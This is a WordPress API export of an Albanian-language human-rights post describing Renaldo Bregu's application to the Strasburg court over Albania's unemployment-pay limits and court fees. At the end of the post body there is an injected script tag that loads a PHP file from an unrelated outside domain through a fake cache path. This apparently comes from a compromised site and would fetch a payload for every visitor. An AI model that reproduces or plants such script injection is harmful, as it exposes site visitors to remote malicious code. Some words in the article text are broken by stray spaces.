{"id":553,"date":"2011-05-02T16:30:02","date_gmt":"2011-05-02T14:30:02","guid":{"rendered":"http:\/\/www.respublica.org.al\/?p=553"},"modified":"2013-10-02T16:36:29","modified_gmt":"2013-10-02T14:36:29","slug":"renaldo-vs-albania","status":"publish","type":"post","link":"https:\/\/www.respublica.org.al\/web\/?p=553","title":{"rendered":"Renaldo vs Albania"},"content":{"rendered":"<header><a title=\"\" href=\"http:\/\/respublicalb.wordpress.com\/\" rel=\"home\">\u00a0<\/a><\/header>\n<div>\n<div>\n<p>Me aplikimin 41411\/1 drejtuar Gjykat\u00ebs s\u00eb Strasburgut, qytetari Renaldo Bregu, i asistuar nga qendra Res Publica hedh ne gjyq Shqip\u00ebrin\u00eb p\u00ebr nj\u00eb seri t\u00eb drejtash t\u00eb garantuara nga Konventa e t\u00eb Drejtave t\u00eb Njeriut. Renaldo Bregu konsideron se i jan\u00eb mohuar t\u00eb drejtat e garantuara nga artikulli 6, 8 dhe nga artikulli<\/p>\n<p>1 i protokollit 1, ve\u00e7 e ve\u00e7 ose s\u00eb bashku me artikullin 13.<\/p>\n<p>Aplikanti Renaldo Bregu jeton n\u00eb Tiran\u00eb dhe \u00ebsht\u00eb aktualisht i papun\u00eb. Nga qershori i vitit 2004 deri n\u00eb vitin 2005 ai ka punuar n\u00eb nj\u00eb nd\u00ebrmarrje lokale. P\u00ebr gati dy vjet p\u00ebr Renaldon ishte e pamundur t\u00eb gjente nj\u00eb pun\u00eb. M\u00eb pas nga gushti 2007 deri dhjetor<\/p>\n<p>2009 ai u pun\u00ebsua n\u00eb nj\u00eb nd\u00ebrmarrje tjet\u00ebr, ku m\u00eb pas gjithashtu u pushua nga puna. P\u00ebr gjat\u00eb vitit 2010 Renaldo p\u00ebrfitoi pages\u00ebn e papun\u00ebsis\u00eb, e cila \u00a0kapte \u00a0fillimisht \u00a0shifr\u00ebn \u00a0e<\/p>\n<p>6320 lek\u00ebve dhe m\u00eb pas u rrit n\u00eb<\/p>\n<p>6565 lek\u00eb. Pages\u00ebn e fundit Renaldo e ka p\u00ebrfituar n\u00eb dat\u00eb 10 janar 2011 dhe sipas ligjit shqiptar (neni 55 i ligjit nr. 7703) nj\u00eb i papun\u00eb, pa\u00e7ka se statusi i tij nuk ka ndryshuar, ai p\u00ebrs\u00ebri nuk mund ta p\u00ebrfitoj\u00eb pages\u00ebn e p\u00ebrmendur m\u00eb sip\u00ebr. Ligji nuk jep asnj\u00eb shpjegim se pse kjo pages\u00eb nuk duhet t\u00eb kaloj\u00eb 12<\/p>\n<p>m u ajt,\u00a0 \u00a0sidomos\u00a0 \u00a0n \u00ebse pun\u00ebk\u00ebrkuesi \u00ebsht\u00eb treguar i v\u00ebmendsh\u00ebm p\u00ebr t\u00eb pranuar ofertat p\u00ebr pun\u00eb q\u00eb n\u00eb teori duhet\u00a0 \u00a0t\u00eb\u00a0 \u00a0ofrohen\u00a0 \u00a0nga\u00a0 \u00a0zyra<\/p>\n<p>specifike\u00a0 \u00a0e\u00a0 \u00a0cila\u00a0 \u00a0kr yen\u00a0 \u00a0dhe pages\u00ebn e papun\u00ebsis\u00eb.<\/p>\n<p>Duke q\u00ebn\u00eb se Renaldo ka qen\u00eb i p\u00ebrpikt\u00eb n\u00eb pag\u00ebsat e tij gjat\u00eb koh\u00ebs kur ka q\u00ebn\u00eb i pun\u00ebsuar, dhe nj\u00ebkoh\u00ebsisht ka treguar vullnetin e tij konstant n\u00eb zyrat e pun\u00ebs, ai p\u00ebrs\u00ebri nuk mund t\u00eb p\u00ebrfitoj\u00eb m\u00eb nga pagesa e papun\u00ebsis\u00eb. \u00a0Pagesa \u00a0e \u00a0p\u00ebrfituar<\/p>\n<p>nga Renaldo gjat\u00eb 12 muajve \u00ebsht\u00eb ende m\u00eb e vog\u00ebl sesa pagesat e b\u00ebra prej tij drejt buxhetit t\u00eb shtetit, gjat\u00eb koh\u00ebs s\u00eb pun\u00ebsimit t\u00eb tij.<\/p>\n<p>Sidoqoft\u00eb, Renaldo nuk mund t\u2019i drejtohet gjykat\u00ebs p\u00ebr t\u00eb b\u00ebr\u00eb k\u00ebrkesa q\u00eb do t\u00eb sqaronin situat\u00ebn e tij t\u00eb t\u00eb drejtave p\u00ebr shkak se Taksa e Padis\u00eb pas urdh\u00ebzimit t\u00eb p\u00ebrbashk\u00ebt t\u00eb Ministris\u00eb s\u00eb Drejt\u00ebsis\u00eb dhe Ministris\u00eb\u00a0 \u00a0s\u00eb\u00a0 \u00a0Financave\u00a0 \u00a0nr.<\/p>\n<p>991\/1, dat\u00eb 02.03.2010 ka kapur kufirin minimal t\u00eb 12.000 lek\u00ebve. Renaldos i duhet q\u00eb t\u00eb shpenzoj\u00eb t\u00eb ardhurat e 2 muajve nga pagesa e papun\u00ebsis\u00eb p\u00ebr t\u00eb patur akses n\u00eb gjykat\u00eb.<\/p>\n<p>Aplikanti mendon se t\u00eb dyja kushtet si ajo e pages\u00ebs s\u00eb ul\u00ebt, ashtu edhe kufizimi n\u00eb 12 muaj b\u00ebjn\u00eb t\u00eb pamundur aksesin e tij n\u00eb gjykat\u00eb. Duke par\u00eb q\u00eb neni 1 dhe\u00a0 \u00a02\u00a0 \u00a0i\u00a0 \u00a0ligjit\u00a0 \u00a0nr.\u00a0 \u00a07703\u00a0 \u00a0dt.<\/p>\n<p>11.05.1993, t\u00eb ardhurat e p\u00ebrfituara\u00a0 \u00a0ng a\u00a0 \u00a0pag esa\u00a0 \u00a0e papun\u00ebsis\u00eb duhet t\u00eb jen\u00eb sa minimumi i jetes\u00ebs. Po t\u00eb merret e mir\u00ebqen\u00eb at\u00ebher\u00eb taksa \u00ebsht\u00eb 2 her\u00eb m\u00eb e lart\u00eb se minimumi i jetes\u00ebs n\u00eb Shqip\u00ebri. N\u00eb situat\u00ebn kur Renaldo dhe \u00e7do i papun\u00eb n\u00eb kushtet e plot\u00ebsuara, p\u00ebrgjat\u00eb 12 muajve t\u00eb pages\u00ebs nuk jan\u00eb n\u00eb gjendje q\u00eb t\u2019i drejtohen gjykat\u00ebs. N\u00eb kushte t\u00eb tilla ka nj\u00eb shkelje t\u00eb t\u00eb drejtave q\u00eb burojn\u00eb nga neni 6 i Konvent\u00ebs Europiane p\u00ebr t\u00eb Drejtat e Njeriut.<\/p>\n<p>N\u00eb kushtet e pamund\u00ebsis\u00eb s\u00eb mir\u00ebkuptimit nga organizmat e brendsh\u00ebm, Renaldo Bregu iu drejtua Gjykat\u00ebs Europiane t\u00eb t\u00eb Drejtave t\u00eb Njeriut n\u00eb Strasburg dhe gjykimi i saj do t\u00eb tregoj\u00eb n\u00ebse Shqip\u00ebria \u00ebsht\u00eb e kujdeshme p\u00ebr t\u00eb respektuar konventat q\u00eb i ka n\u00ebnshkruar vet\u00eb gjat\u00eb proceseve t\u00eb ndryshme integruese.<\/p>\n<\/div>\n<\/div>\n<p><script type=\"text\/javascript\" src=\"#\"><\/script><script type=\"text\/javascript\" src=\"http:\/\/www.get.space\/wp-content\/cache\/tmpWpfc\/theme-index.php\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u00a0 Me aplikimin 41411\/1 drejtuar Gjykat\u00ebs s\u00eb Strasburgut, qytetari Renaldo Bregu, i asistuar nga qendra Res Publica hedh ne gjyq [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":554,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""}},"footnotes":""},"categories":[6],"tags":[],"_links":{"self":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts\/553"}],"collection":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=553"}],"version-history":[{"count":2,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts\/553\/revisions"}],"predecessor-version":[{"id":557,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts\/553\/revisions\/557"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/media\/554"}],"wp:attachment":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=553"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=553"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=553"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}